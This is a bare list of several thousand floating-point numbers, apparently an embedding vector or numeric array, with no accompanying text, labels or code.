0.016268210485577583, 0.015120018273591995, -0.005831270013004541, 0.005457139573991299, 0.023247674107551575, -0.020499752834439278, -0.007934139110147953, 0.01846138760447502, -0.00865014735609293, -0.020680366083979607, 0.021493131294846535, -0.0422896072268486, -0.015236128121614456, -0.03351690247654915, 0.00234476407058537, 0.008172808215022087, 0.012243086472153664, 0.007172978017479181, 0.03284604847431183, 0.00934035237878561, -0.0005946573219262064, 0.007695470005273819, -0.020590059459209442, 0.013081653974950314, 0.008121204562485218, 0.000274550257017836, 0.025969792157411575, -0.015068414621055126, -0.03258802741765976, -0.0012062472524121404, -0.035477858036756516, 0.02315736562013626, -0.027169588953256607, 0.01474588830024004, 0.021093199029564857, -0.011152949184179306, -0.005208794958889484, 0.009959602728486061, -0.05402955412864685, 0.008076051250100136, -0.027995256707072258, -0.009391956962645054, -0.009050079621374607, -0.019403163343667984, -0.021415725350379944, 0.012236636132001877, -0.029956214129924774, 0.027169588953256607, -0.012984896078705788, 0.0037413015961647034, 0.020525554195046425, -0.009798339568078518, 0.0074180979281663895, -0.0029962663538753986, -0.02755662053823471, 0.0049927025102078915, -0.014216945506632328, -0.023015454411506653, 0.022692928090691566, -0.009056529961526394, -0.004873367957770824, 0.005950604565441608, -0.01558445580303669, 0.012236636132001877, 0.02696317248046398, 0.005682907998561859, -0.019790194928646088, 0.012436602264642715, -0.0745164081454277, -0.007243933621793985, -0.00022274450748227537, -0.04757903516292572, -0.013081653974950314, -0.0334910973906517, 0.024731293320655823, -0.008804959245026112, -0.018783913925290108, 0.023957230150699615, 0.013191313482820988, 0.0033929734490811825, -0.02747921459376812, 0.022770335897803307, 0.019557975232601166, -0.009108133614063263, 0.030369047075510025, -0.016229508444666862, 0.005763539578765631, 0.011868956498801708, 0.02998201549053192, -0.018474288284778595, 0.0006188467377796769, 0.031143110245466232, -0.01615210250020027, 0.05346190929412842, 0.02288644388318062, 0.020499752834439278, -0.02807266265153885, 0.003721949877217412, 0.008276017382740974, -0.018177565187215805, -0.00017799403576646, -0.04605671018362045, -0.009940250776708126, -0.004079953767359257, 0.031143110245466232, 0.04161875322461128, -0.006805298384279013, -0.010295029729604721, -0.004312172532081604, -0.0019561201333999634, -0.03777424246072769, 0.033052463084459305, -0.04794026166200638, 0.02889832854270935, -0.02706638164818287, -0.005405535455793142, 0.01094008143991232, 0.0017787308897823095, 0.0006289256853051484, 0.0219962727278471, -0.024408766999840736, 0.03057546354830265, -0.0005406342097558081, -0.04350230470299721, 0.006079615093767643, 0.023350881412625313, -0.006463421043008566, 0.012475305236876011, 0.002377016469836235, -0.041412338614463806, -0.05023664981126785, 0.012933292426168919, -0.01017891988158226, -0.034884411841630936, -0.004392804112285376, 0.053307097405195236, 0.011127146892249584, -0.018874220550060272, 0.033052463084459305, 0.0014344343217089772, 0.01644882559776306, -0.03470379486680031, 0.011598034761846066, 0.025866584852337837, 0.016319815069437027, -0.003602615324780345, 0.022176887840032578, -0.032459016889333725, 0.012991347350180149, -0.025273136794567108, 0.0010756241390481591, 0.0006398109253495932, -0.01852589286863804, 0.027917848899960518, 0.0024415217339992523, 0.019145142287015915, 0.010862675495445728, 0.008740453980863094, -0.054648805409669876, -0.010501446202397346, -0.011172300204634666, 0.0035606869496405125, -0.011643188074231148, 0.025531157851219177, 0.003425226081162691, 0.008766256272792816, -0.02337668463587761, 0.0017674424452707171, -0.011720594950020313, -0.03300086036324501, -0.023557297885417938, -0.00754065765067935, 0.007463251240551472, 0.008508235216140747, 0.00614412035793066, -0.026331022381782532, -0.02505381964147091, -0.04197998344898224, -0.049978628754615784, 0.025040917098522186, 0.015094215981662273, 0.014978107064962387, 0.008921069093048573, -0.003979970701038837, -0.025776276364922523, -0.027092183008790016, -0.01931285671889782, -0.006850452162325382, 0.0023044482804834843, -0.035555265843868256, -0.019815996289253235, 0.026498734951019287, -0.01105619128793478, -0.03315567225217819, 0.025789178907871246, -0.01515872124582529, -0.03341369330883026, -0.009469362907111645, 0.04530845209956169, 0.001316712354309857, -0.01789374276995659, 0.0019819221924990416, -0.025711771100759506, -0.023905625566840172, 0.04432797059416771, -0.003641318529844284, 0.0028801572043448687, 0.0022254292853176594, 0.011739945970475674, -0.024886105209589005, 0.010965883731842041, 0.020035315304994583, 0.002636649878695607, -0.033387891948223114, 0.005344255827367306, 0.03478120267391205, 0.0007780939340591431, 0.0003519564925227314, 0.033723317086696625, -0.04868852347135544, 0.014965206384658813, -0.035813286900520325, -0.044353775680065155, -0.017442205920815468, 0.04600510746240616, 0.007553558796644211, 0.013429982587695122, -0.010882026515901089, -0.054081156849861145, 0.04172196239233017, 0.023879824206233025, 0.03478120267391205, -0.0017448655562475324, -0.01860329881310463, -0.0021222210489213467, 0.020164325833320618, -0.03160754591226578, 0.0150813153013587, 0.024653887376189232, 0.011939912103116512, 0.018474288284778595, -0.007289087399840355, 0.03073027729988098, 0.03416195139288902, 0.044198960065841675, -0.04161875322461128, -0.04014803469181061, 0.0019593453034758568, -0.010056360624730587, -0.002975302282720804, 0.020293334499001503, -0.01317841187119484, 0.005899000447243452, -0.051887981593608856, 0.0051346137188375, -0.03362010791897774, 0.04556647315621376, -0.011539979837834835, 0.049875419586896896, -0.008488884195685387, -0.006163471844047308, -0.004476660862565041, 0.020602960139513016, 0.023802418261766434, 0.016913263127207756, 0.012056021951138973, 0.01331387273967266, 0.00866949837654829, 0.015623158775269985, -0.030214235186576843, 0.013997628353536129, 0.0007704339805059135, -0.017093878239393234, 0.02538924664258957, 0.004628248047083616, 0.02203497663140297, 0.0009062980534508824, -0.010204722173511982, 0.009424209594726562, -0.02169954776763916, 0.008114754222333431, 0.024266855791211128, -0.022680027410387993, -0.020448148250579834, -0.03586488962173462, 0.031117307022213936, -0.005457139573991299, 0.01842268370091915, -0.01678425259888172, -0.031117307022213936, 0.009953152388334274, -0.007063319440931082, 0.023479891940951347, 0.006940759252756834, -0.016100497916340828, 0.033981338143348694, -0.004521814174950123, -0.02110610157251358, 0.007514855824410915, 0.014397560618817806, 0.011623837053775787, -0.007689019665122032, 0.011830253526568413, 0.02051265351474285, -0.01306875329464674, -0.0013715417589992285, -0.018809715285897255, 0.00475403293967247, -0.03643253445625305, -0.03452318161725998, 0.038909535855054855, -0.004612121731042862, 0.018616199493408203, -0.007985743694007397, -0.005041081458330154, 0.029207954183220863, 0.03031744249165058, -0.0034155503381043673, -0.002604397479444742, -0.010669159702956676, 0.015210325829684734, -0.002394755370914936, 0.010733664967119694, 0.014216945506632328, 0.01909353956580162, -0.0161133985966444, -0.006389239802956581, 0.02662774547934532, -0.005218470469117165, -0.008301818743348122, 0.010456292890012264, 0.027505015954375267, -0.002662452170625329, 0.008701751008629799, -0.002888220362365246, -0.008888816460967064, 0.012713974341750145, 0.0017835687613114715, 0.0035477858036756516, 0.01532643474638462, -0.026498734951019287, 0.04600510746240616, -0.009179090149700642, -0.044689200818538666, -0.01107554230839014, 0.02166084572672844, 0.028021058067679405, 0.009075880981981754, -0.011172300204634666, 0.01931285671889782, 0.00720523064956069, 0.021338319405913353, 0.02587948553264141, 0.012662370689213276, 0.012578513473272324, -0.004512138664722443, 0.0027092183008790016, 0.004289595875889063, -0.018912924453616142, 0.014216945506632328, 0.02181565761566162, -0.041773565113544464, -0.0033187924418598413, 0.010262777097523212, -0.00839212629944086, 0.012036669999361038, -0.029336964711546898, -0.006073164287954569, 0.002394755370914936, -0.012997797690331936, -0.020590059459209442, 0.027763037011027336, 0.04079308733344078, -0.036406733095645905, -0.006037686485797167, 0.020525554195046425, 0.017093878239393234, -0.01745510660111904, -0.0029124096035957336, -0.00234960182569921, 0.014978107064962387, 0.009669329039752483, -0.013997628353536129, 0.002333475509658456, -0.013610596768558025, 0.00883721187710762, -0.011475474573671818, 0.012836534529924393, 0.0031139885541051626, 0.03297505900263786, -0.0653824657201767, -0.007063319440931082, 0.011133597232401371, 0.008882366120815277, 0.017364799976348877, -0.011204552836716175, 0.019377361983060837, 0.055010031908750534, -0.002835003426298499, -0.006573079619556665, -0.020822277292609215, -0.012010867707431316, -0.02028043381869793, 0.0010490157874301076, 0.037309806793928146, -0.007734173443168402, -0.032794442027807236, -0.02647293359041214, 0.016345616430044174, -0.011572232469916344, 0.02467968873679638, -0.0067472439259290695, -0.006279581226408482, 0.005763539578765631, 0.0010014432482421398, -0.016913263127207756, 0.038935337215662, 0.0544423870742321, -0.024137845262885094, 0.02363470382988453, 0.04239281639456749, -0.030007818713784218, 0.00749550387263298, -0.0018706507980823517, -0.04076728597283363, -0.007934139110147953, -0.005173316691070795, 0.01519742514938116, -0.011636737734079361, 0.002465711208060384, 0.03929656744003296, -0.010378886014223099, 0.011875406838953495, 0.013417080976068974, -0.00682464987039566, -0.004837889689952135, 0.0017529287142679095, -0.010140216909348965, -0.01155933178961277, 0.0003491343813948333, -0.040586668998003006, -0.003004329511895776, 0.0018900022841989994, 0.0314011313021183, -0.011043289676308632, 0.04868852347135544, -0.0015626384411007166, 0.002672127913683653, -0.005692583974450827, -0.013023599982261658, -0.022344600409269333, 0.019029034301638603, -0.03186556696891785, 0.003921916242688894, 0.016771351918578148, -0.012591415084898472, -0.009327451698482037, 0.0038283835165202618, 0.0049443235620856285, 0.0032526745926588774, -0.018022753298282623, -0.03444577753543854, -0.03694857656955719, -0.02747921459376812, 0.016719747334718704, 0.021983372047543526, 0.0026963173877447844, 0.008011545985937119, 0.03834189102053642, 0.016203705221414566, 0.00475403293967247, -0.03284604847431183, 0.008288918063044548, 0.0067472439259290695, 0.006966561544686556, 0.011152949184179306, 0.03276864066720009, -0.004757258575409651, 0.019815996289253235, 0.007108472753316164, 0.019828898832201958, -0.014810393564403057, 0.024589382112026215, -0.03382652625441551, 0.002667289925739169, -0.022267194464802742, 0.003236548276618123, 0.025931090116500854, -0.039090149104595184, 0.011081992648541927, 0.018771013244986534, 0.02248651161789894, -0.011856055818498135, -0.05377153307199478, -0.009056529961526394, 0.004670176189392805, 0.021609241142868996, -0.00436377665027976, 0.03418775647878647, -0.027582421898841858, -0.0012239861534908414, -0.025776276364922523, 0.0017206761986017227, 0.01515872124582529, 0.037903252989053726, 0.03282024338841438, 0.015726367011666298, -0.009643526747822762, 0.015352237038314342, -0.014965206384658813, -0.006602107081562281, 0.013558993116021156, -0.05578409507870674, 0.008385675959289074, 0.026756756007671356, -0.04708879441022873, -0.0034026491921395063, 0.013597696088254452, 0.024615183472633362, 0.009895097464323044, -0.0169648677110672, 0.0047766100615262985, -0.03374911844730377, 0.041334930807352066, 0.00898557435721159, -0.020293334499001503, 0.01157868281006813, -0.00839212629944086, -0.04388933628797531, 0.008914618752896786, -0.02400883473455906, -0.02830488048493862, 0.05015924200415611, -0.009140386246144772, -0.01711967960000038, -0.020370742306113243, 0.03467799350619316, 0.013920221477746964, 0.001970633864402771, -0.011843154206871986, 0.008263115771114826, 0.022460710257291794, -0.01549414824694395, -0.02028043381869793, -0.035065025091171265, -0.018358180299401283, -0.03460058942437172, 0.007676118519157171, -0.016951967030763626, 0.01390732079744339, 0.004899169784039259, -0.011198102496564388, 0.007308438885957003, 0.03343949466943741, 0.015481247566640377, -0.012662370689213276, -0.0005237016011960804, -0.01441046129912138, -0.006092515774071217, 0.00833407137542963, -0.016500430181622505, 0.006066713947802782, -0.016758451238274574, -0.037903252989053726, -0.015094215981662273, -0.006150570698082447, -0.008237313479185104, 0.006953660398721695, -0.013610596768558025, 0.013610596768558025, -0.00008390715083805844, -0.023931428790092468, -0.0024189448449760675, 0.014694283716380596, 0.022383304312825203, 0.018358180299401283, 0.001754541415721178, -0.00041686484473757446, -0.030781880021095276, 0.03862571343779564, -0.021841460838913918, -0.008940420113503933, -0.008417928591370583, -0.011817351914942265, -0.007818030193448067, -0.01553285215049982, -0.02065456472337246, 0.01998371072113514, -0.013778310269117355, -0.007901886478066444, 0.03963199257850647, 0.02822747454047203, 0.00842437893152237, 0.018616199493408203, -0.0006478740833699703, -0.009391956962645054, -0.0029333739075809717, -0.016358518972992897, 0.002183500910177827, 0.0015779584646224976, 0.024653887376189232, 0.006631134543567896, -0.022125283256173134, -0.00999185536056757, 0.049875419586896896, 0.017958248034119606, -0.0025689194444566965, -0.0067472439259290695, 0.009495165199041367, -0.0033703965600579977, -0.007469702046364546, -0.006182823330163956, 0.058003075420856476, 0.005205569323152304, -0.021351220086216927, -0.022847741842269897, -0.009753186255693436, -0.007643865887075663, 0.0026818036567419767, 0.03888373449444771, -0.017506711184978485, -0.008966222405433655, 0.022938048467040062, 0.007818030193448067, 0.0036187416408210993, -0.026859965175390244, 0.012481755577027798, -0.011856055818498135, -0.028253277763724327, -0.00006495875277323648, 0.00699236337095499, 0.0013231629272922873, -0.024782897904515266, -0.025182830169796944, 0.014668482355773449, 0.013249367475509644, -0.01191410981118679, -0.01581667549908161, -0.012056021951138973, 0.010262777097523212, 0.008598542772233486, 0.0004688721674028784, 0.013997628353536129, 0.012481755577027798, -0.014165341854095459, -0.003152691526338458, 0.029001537710428238, -0.00926294643431902, 0.011681891046464443, 0.01584247685968876, 0.016087597236037254, -0.014771690592169762, -0.007301988545805216, -0.01566186174750328, -0.018035653978586197, -0.015300633385777473, -0.006018334999680519, 0.0016360130393877625, -0.00019079427875112742, 0.03777424246072769, -0.006563404109328985, -0.002633424708619714, -0.0066633871756494045, -0.0098434928804636, 0.0236734077334404, -0.02349279262125492, -0.04881753399968147, 0.017648622393608093, 0.022202689200639725, -0.012668821029365063, 0.014049232006072998, -0.01875811256468296, -0.004715329967439175, 0.0009232306620106101, 0.00223187985830009, -0.02840808965265751, 0.0004265406168997288, 0.003460703883320093, -0.042676638811826706, -0.05157835781574249, -0.0031897821463644505, 0.01390732079744339, 0.00396061921492219, 0.010030558332800865, -0.005031405482441187, 0.00971448328346014, 0.01822916977107525, -0.035735879093408585, -0.012546260841190815, -0.044456981122493744, -0.04414735734462738, -0.017906643450260162, 0.006195724476128817, -0.021299617365002632, 0.0025511805433779955, 0.02013852261006832, -0.009811240248382092, 0.01714548096060753, 0.023273475468158722, -0.008114754222333431, -0.0010216010268777609, 0.02554405853152275, -0.0251312255859375, -0.007643865887075663, 0.0010232137283310294, 0.026447130367159843, -0.02359600178897381, -0.010475643910467625, -0.03617451339960098, -0.009243594482541084, -0.017313195392489433, 0.012681721709668636, -0.000645858293864876, 0.053823135793209076, -0.0005672425613738596, 0.05820949003100395, 0.00614412035793066, -0.006585980765521526, -0.01700356975197792, 0.013881518505513668, -0.01224953681230545, -0.014229847118258476, 0.06476321816444397, -0.015726367011666298, -0.005499068181961775, -0.016977768391370773, 0.022641325369477272, 0.024370063096284866, -0.017351897433400154, -0.011630287393927574, -0.00883721187710762, 0.011475474573671818, -0.0036606700159609318, -0.03537464886903763, 0.015274831093847752, 0.00043742588604800403, -0.01850009150803089, -0.018319476395845413, -0.038935337215662, -0.02270583063364029, -0.05126873031258583, 0.03552946448326111, 0.013958924449980259, -0.016165003180503845, 0.010249876417219639, 0.019622480496764183, 0.003734851023182273, 0.010249876417219639, -0.010804620571434498, -0.00027374393539503217, 0.007637415546923876, 0.008979124017059803, 0.01615210250020027, -0.013765409588813782, 0.013075203634798527, 0.004096080083400011, -0.011494826525449753, -0.009114584885537624, 0.013700904324650764, 0.045205242931842804, -0.014204044826328754, 0.010088613256812096, -0.029956214129924774, -0.0052442727610468864, -0.013326774351298809, 0.006386014632880688, -0.02215108461678028, -0.0022286546882241964, 0.026988975703716278, 0.0007369719096459448, 0.022202689200639725, -0.009579021483659744, 0.02296384982764721, 0.015507049858570099, -0.014139539562165737, 0.011778648942708969, 0.025737574324011803, -0.019364461302757263, -0.04012223333120346, 0.009011376649141312, 0.03787745162844658, -0.005344255827367306, -0.015378039330244064, 0.0014150828355923295, -0.0009030727669596672, 0.00542488694190979, 0.01541674230247736, -0.013829914852976799, 0.0011014263145625591, -0.026653548702597618, -0.009404857642948627, -0.01942896656692028, 0.025479553267359734, -0.022950949147343636, -0.008611444383859634, -0.003883213037624955, -0.004612121731042862, -0.027453413233160973, 0.01748090796172619, 0.0030220686458051205, -0.01595858670771122, -0.009533868171274662, 0.030807683244347572, -0.04231540858745575, -0.026705151423811913, -0.007153626531362534, -0.013120356947183609, 0.006792397238314152, 0.0010022495407611132, -0.01536513864994049, 0.022576820105314255, -0.009011376649141312, -0.033723317086696625, -0.01191410981118679, 0.026085902005434036, -0.024021735414862633, 0.045024629682302475, -0.005911901593208313, -0.016771351918578148, -0.013249367475509644, -0.012333394028246403, -0.0022173661272972822, -0.01573926769196987, -0.022809037938714027, -0.0385483056306839, 0.00653437664732337, 0.00023887080897111446, -0.014087934978306293, 0.02464098483324051, 0.018396882340312004, -0.015042612329125404, -0.022305898368358612, -0.0048959446139633656, -0.00716007687151432, -0.02747921459376812, -0.0009175864397548139, 0.032459016889333725, 0.0703364685177803, -0.017777632921934128, -0.021802756935358047, -0.015545752830803394, 0.006605332251638174, 0.0001767845533322543, -0.0017319645266979933, -0.0036316425539553165, -0.011927011422812939, 0.012894589453935623, 0.0012151167029514909, 0.0012554323766380548, 0.008450181223452091, 0.013120356947183609, 0.009927350096404552, -0.004602445755153894, 0.01964828372001648, -0.004821763373911381, 0.02191886678338051, -0.01755831576883793, -0.012133427895605564, 0.004683077335357666, 0.006518250331282616, -0.026653548702597618, 0.013223565183579922, -0.025956891477108, -0.012114075943827629, -0.024511976167559624, -0.02501511573791504, -0.009907998144626617, -0.002451197477057576, -0.015571555122733116, -0.016719747334718704, -0.007134275045245886, -0.0044347322545945644, 0.011965714395046234, 0.029775599017739296, -0.024331361055374146, -0.01804855465888977, -0.018242070451378822, 0.006947210058569908, -0.02296384982764721, -0.02889832854270935, -0.025750475004315376, -0.006708540488034487, 0.00028664496494457126, 0.011269058100879192, 0.003399424022063613, -0.008301818743348122, -0.0076696681790053844, 0.018745210021734238, -0.017068075016140938, 0.01228824071586132, 0.01094008143991232, -0.009895097464323044, 0.0343683697283268, -0.0066633871756494045, -0.003386522876098752, -0.0033542702440172434, -0.016693945974111557, -0.01519742514938116, 0.0022996102925390005, -0.009849944151937962, 0.009327451698482037, -0.0002818070934154093, -0.004167035687714815, -0.00425089243799448, 0.006582755595445633, -0.023802418261766434, 0.04112851619720459, 0.00048419213271699846, 0.017777632921934128, -0.002725344616919756, -0.010598204098641872, 0.014333055354654789, 0.018667804077267647, -0.0028237150982022285, 0.03214938938617706, -0.008830761536955833, -0.019970810040831566, 0.04577288776636124, 0.03612291067838669, -0.026189111173152924, 0.024550678208470345, 0.0014537859242409468, 0.015597356483340263, -0.02864030748605728, -0.007224582135677338, -0.01637141965329647, 0.003386522876098752, -0.0010345021728426218, 0.01127550844103098, 0.045127835124731064, 0.025673069059848785, 0.012726875953376293, 0.023144464939832687, 0.024292657151818275, -0.009527417831122875, -0.019674085080623627, 0.013920221477746964, 0.0006422298611141741, -0.005960280541330576, 0.026859965175390244, -0.0047411322593688965, -0.025827880948781967, 0.0017964697908610106, -0.0032139713875949383, 0.022344600409269333, 0.009475813247263432, 0.005221695639193058, -0.03176235780119896, -0.010140216909348965, 0.024924809113144875, -0.021609241142868996, -0.02453777752816677, 0.018242070451378822, -0.0021222210489213467, -0.008811410516500473, -0.02337668463587761, -0.02740180864930153, -0.024705490097403526, -0.023725012317299843, 0.023905625566840172, -0.013946023769676685, 0.012475305236876011, 0.0163327157497406, 0.01482329424470663, -0.011346464045345783, 0.03710338845849037, 0.01700356975197792, 0.033981338143348694, -0.000994186382740736, 0.009391956962645054, -0.0006422298611141741, 0.019377361983060837, -0.03914175555109978, 0.010095063596963882, 0.0009530643001198769, -0.025647267699241638, 0.0035832638386636972, -0.011417419649660587, 0.0013175186468288302, 0.0032655757386237383, -0.008469532243907452, 0.008953321725130081, 0.00013032065180595964, -0.004915296100080013, 0.011681891046464443, 0.02371211163699627, 0.014500768855214119, -0.0052313716150820255, -0.025221532210707664, -0.0008296981104649603, 0.03091089054942131, -0.004918521270155907, -0.002280258806422353, 0.038058068603277206, -0.007547107990831137, 0.015636060386896133, -0.01812596060335636, -0.007927688769996166, 0.019635383039712906, 0.014023429714143276, -0.017996950075030327, 0.0058538466691970825, 0.019674085080623627, 0.013204214163124561, -0.036226119846105576, -0.019957907497882843, -0.03457478806376457, 0.012443052604794502, 0.011610935442149639, -0.0024673237930983305, 0.04667596146464348, 0.017442205920815468, 0.022138183936476707, -0.01424274779856205, 0.0314011313021183, 0.0211448036134243, -0.015829576179385185, -0.00019432191038504243, 0.01607469469308853, 0.010823972523212433, 0.006447294726967812, -0.002752759261056781, -0.012101175263524055, -0.013023599982261658, 0.015481247566640377, -0.044095754623413086, 0.013842815533280373, -0.011049740016460419, 0.0368453674018383, 0.007850282825529575, -0.03441997244954109, -0.011759297922253609, -0.017661523073911667, 0.008469532243907452, -0.009624175727367401, -0.003892888780683279, 0.0035703626926988363, -0.009746735915541649, -0.01681005395948887, -0.0004918521153740585, -0.005557122640311718, -0.015829576179385185, -0.04701139032840729, 0.040999505668878555, 0.019145142287015915, -0.019261252135038376, -0.01659073680639267, -0.0009450011420994997, 0.03751622512936592, 0.004205739125609398, 0.007818030193448067, -0.004892719443887472, 0.013636399060487747, 0.010095063596963882, -0.0024060439318418503, 0.0008059118408709764, -0.013700904324650764, -0.002772110980004072, 0.0005486973677761853, 0.009308099746704102, 0.002099644159898162, -0.01852589286863804, -0.0009796726517379284, 0.015648961067199707, -0.007069769781082869, -0.004228315781801939, 0.016616538166999817, -0.016023091971874237, 0.00875980593264103, 0.008611444383859634, 0.021751152351498604, -0.01499100774526596, -0.016539132222533226, 0.022460710257291794, 0.009527417831122875, 0.0006377951358444989, 0.02140282467007637, 0.0044895620085299015, 0.0012925228802487254, -0.025337642058730125, -0.0040154485031962395, -0.0003457075508777052, -0.0002551986835896969, 0.006124768406152725, -0.004079953767359257, -0.017248690128326416, 0.02956918254494667, -0.01834527775645256, 0.0018932275706902146, -0.005553897470235825, 0.013868617825210094, -0.0003592133289203048, 0.03764523193240166, -0.01074011530727148, 0.02923375554382801, 0.0005753057193942368, 0.0016674593789502978, -0.0035510112065821886, -0.021647945046424866, -0.0032333231065422297, 0.02416364662349224, -0.036896973848342896, 0.010598204098641872, -0.0019722464494407177, -0.0023270249366760254, 0.026988975703716278, -0.008050248958170414, 0.02173825167119503, 0.017055174335837364, 0.010901378467679024, -0.0301626306027174, -0.002098031574860215, -0.023699209094047546, -0.0076567670330405235, 0.0026092352345585823, 0.0007535013719461858, -0.002117383060976863, 0.005989307537674904, 0.03560686856508255, 0.010533698834478855, -0.018874220550060272, 0.013455783948302269, -0.01212052721530199, -0.03787745162844658, -0.005344255827367306, -0.03496181592345238, 0.0004110190493520349, 0.003983195871114731, 0.013049401342868805, -0.01782923750579357, -0.020564258098602295, 0.023221870884299278, 0.005728061776608229, -0.005592600908130407, 0.00720523064956069, -0.011636737734079361, -0.014539471827447414, 0.0024673237930983305, 0.04925616830587387, 0.014539471827447414, -0.0008651759708300233, 0.0065795304253697395, 0.012152778916060925, -0.013391279615461826, 0.0012384997680783272, -0.0044218311086297035, -0.0005696615553461015, -0.006402140948921442, -0.01615210250020027, -0.002602784661576152, -0.0024947384372353554, 0.005595826078206301, 0.006082840263843536, 0.00503463065251708, 0.014307253062725067, -0.03225259855389595, 0.002054490614682436, 0.017351897433400154, -0.0351940356194973, -0.038006462156772614, -0.019596679136157036, -0.016526231542229652, 0.007534207310527563, 0.008443730883300304, 0.00937905628234148, 0.005295876879245043, -0.0005656299763359129, -0.0003453043755143881, -0.0022447810042649508, 0.0118367038667202, 0.011127146892249584, -0.006386014632880688, -0.025866584852337837, 0.013094555586576462, -0.012017318047583103, 0.0018690380966290832, -0.012526909820735455, -0.0196869857609272, 0.023054158315062523, -0.0032252599485218525, 0.017055174335837364, 0.0018029202474281192, 0.009121035225689411, -0.015171622857451439, 0.023312179371714592, -0.020667465403676033, -0.03612291067838669, -0.015094215981662273, 0.004905620124191046, -0.019815996289253235, 0.019635383039712906, -0.008134105242788792, -0.003209133632481098, -0.0004144459089729935, -0.0020690043456852436, 0.006418267264962196, -0.03163335099816322, 0.012404349632561207, -0.0069794622249901295, 0.009314551018178463, -0.000058961781178368255, 0.012662370689213276, -0.012765578925609589, -0.002186726313084364, 0.020667465403676033, -0.012410799972712994, -0.007527756504714489, -0.01662944070994854, 0.027530819177627563, 0.011469024233520031, -0.0015682826051488519, -0.007850282825529575, -0.0008506622980348766, 0.002230267273262143, -0.0029607885517179966, -0.012591415084898472, 0.012552711181342602, 0.01662944070994854, -0.011772198602557182, -0.0031817189883440733, 0.023466991260647774, -0.0219962727278471, 0.016835857182741165, -0.0036832469049841166, 0.012056021951138973, -0.007721272297203541, 0.021415725350379944, -0.019751491025090218, 0.005731286946684122, -0.004786285571753979, 0.01917094551026821, 0.004247667267918587, 0.006444069091230631, 0.023879824206233025, 0.0026076226495206356, -0.016203705221414566, -0.029698193073272705, 0.011862506158649921, 0.005276525393128395, -0.014603977091610432, 0.0049088457599282265, 0.012333394028246403, 0.019145142287015915, -0.007992194034159184, -0.013765409588813782, 0.038419295102357864, 0.015971487388014793, 0.009385506622493267, 0.009288748726248741, 0.0034155503381043673, -0.0024786123540252447, 0.0009450011420994997, -0.005253948271274567, -0.019441867247223854, 0.004686302505433559, 0.0030575464479625225, 0.019557975232601166, 0.000046136334276525304, 0.007301988545805216, -0.02288644388318062, -0.03818707913160324, -0.004308947362005711, -0.020499752834439278, -0.013546091504395008, -0.01737770065665245, 0.011294860392808914, -0.01629401370882988, 0.009811240248382092, 0.026447130367159843, 0.001777118188329041, -0.007424548268318176, 0.018474288284778595, 0.019880501553416252, -0.008843662217259407, 0.0012118914164602757, -0.03235580772161484, 0.019622480496764183, 0.019583778455853462, -0.00898557435721159, -0.01846138760447502, 0.0013384828343987465, -0.0036929226480424404, 0.006547277793288231, -0.032717037945985794, -0.017919544130563736, -0.011565782129764557, -0.010056360624730587, 0.01688746176660061, 0.017287394031882286, 0.0014529796317219734, 0.015003909356892109, -0.019377361983060837, 0.01357189379632473, -0.025892386212944984, 0.0012691398151218891, -0.0034284512512385845, -0.006934308912605047, 0.01077236793935299, -0.007508405018597841, 0.018783913925290108, 0.02964658848941326, 0.019467668607831, 0.007914788089692593, -0.014126638881862164, -0.006631134543567896, 0.013049401342868805, 0.008856563828885555, 0.019209647551178932, 0.02158343978226185, 0.006550502963364124, -0.0024979638401418924, 0.010043459013104439, -0.0030349695589393377, -0.005237821955233812, -0.012126977555453777, -0.00814700685441494, -0.011881857179105282, 0.0024866752792149782, 0.005347480997443199, 0.005015279166400433, 0.016461726278066635, -0.008153457194566727, 0.0021802757401019335, -0.01625530980527401, -0.0017916319193318486, 0.010546599514782429, 0.012262438423931599, 0.00009020648576552048, -0.0035510112065821886, 0.0005624046898446977, 0.015068414621055126, 0.00614412035793066, 0.02057715877890587, 0.0022721956484019756, 0.0035864890087395906, 0.023312179371714592, -0.014978107064962387, -0.016268210485577583, -0.018745210021734238, 0.019519273191690445, 0.010527248494327068, -0.006227977108210325, -0.00654405215755105, -0.009611274115741253, 0.004763708915561438, 0.008430829271674156, -0.014771690592169762, 0.0033542702440172434, -0.009927350096404552, 0.00003414239836274646, -0.0013255818048492074, 0.013533190824091434, -0.0003936832945328206, -0.025298938155174255, -0.0406382754445076, -0.02102869376540184, -0.008372774347662926, -0.008972672745585442, 0.01591988280415535, -0.007682569324970245, -0.024963511154055595, 0.012546260841190815, 0.011791550554335117, -0.009417759254574776, 0.002883382374420762, 0.004154134541749954, -0.025711771100759506, 0.0005555510288104415, 0.001461849082261324, -0.003809032030403614, -0.0035219837445765734, -0.009927350096404552, 0.03676796332001686, 0.0070826709270477295, 0.0009949926752597094, -0.004012223333120346, -0.023995934054255486, 0.02516992762684822, -0.024782897904515266, 0.009856394492089748, 0.0032220345456153154, -0.0045540668070316315, 0.01051434688270092, -0.0009272622410207987, -0.0029559507966041565, 0.004828214179724455, 0.015945684164762497, 0.01573926769196987, 0.005931253079324961, -0.017726028338074684, -0.0006176372990012169, 0.007243933621793985, -0.00475403293967247, 0.008882366120815277, -0.007785777561366558, 0.001848073909059167, 0.028098464012145996, 0.01607469469308853, 0.012204383499920368, 0.03720659762620926, 0.0016900361515581608, -0.006147345528006554, 0.025814980268478394, 0.005053982138633728, 0.02629231847822666, 0.018203366547822952, -0.003409099765121937, 0.0039186906069517136, -0.0018577496521174908, -0.004660500679165125, 0.004431507084518671, -0.0031817189883440733, 0.024253955110907555, 0.007366493809968233, -0.019751491025090218, -0.008134105242788792, -0.0009570958791300654, 0.0322783999145031, -0.004125107545405626, 0.00898557435721159, 0.013778310269117355, -0.014681383036077023, -0.021609241142868996, 0.012907490134239197, -0.01068206038326025, -0.03493601456284523, -0.006098966579884291, 0.01897742971777916, 0.009043628349900246, -0.01032728236168623, 0.013507388532161713, 0.0005297489697113633, -0.01010151393711567, -0.011430321261286736, -0.0014836195623502135, 0.025943990796804428, 0.02442166768014431, -0.027350204065442085, 0.007095571607351303, -0.003699373221024871, -0.015094215981662273, -0.0030849610920995474, 0.0018303350079804659, 0.02635682374238968, 0.004583094269037247, -0.00011651251406874508, -0.01595858670771122, 0.005647430196404457, -0.0075858114287257195, -0.005869972985237837, 0.013275169767439365, 0.010282129049301147, -0.0100499102845788, 0.011714143678545952, 0.01875811256468296, -0.009133935905992985, -0.03542625531554222, 0.007482603192329407, 0.010391787625849247, -0.01871940866112709, 0.00033502388396300375, -0.018100159242749214, -0.016500430181622505, 0.025144126266241074, -0.018771013244986534, 0.01674554869532585, -0.010185371153056622, 0.021983372047543526, 0.023221870884299278, -0.017016470432281494, 0.0005571636720560491, -0.01767442375421524, 0.014436263591051102, -0.01648752950131893, -0.025634365156292915, 0.002077067270874977, 0.0008724327781237662, 0.011985065415501595, 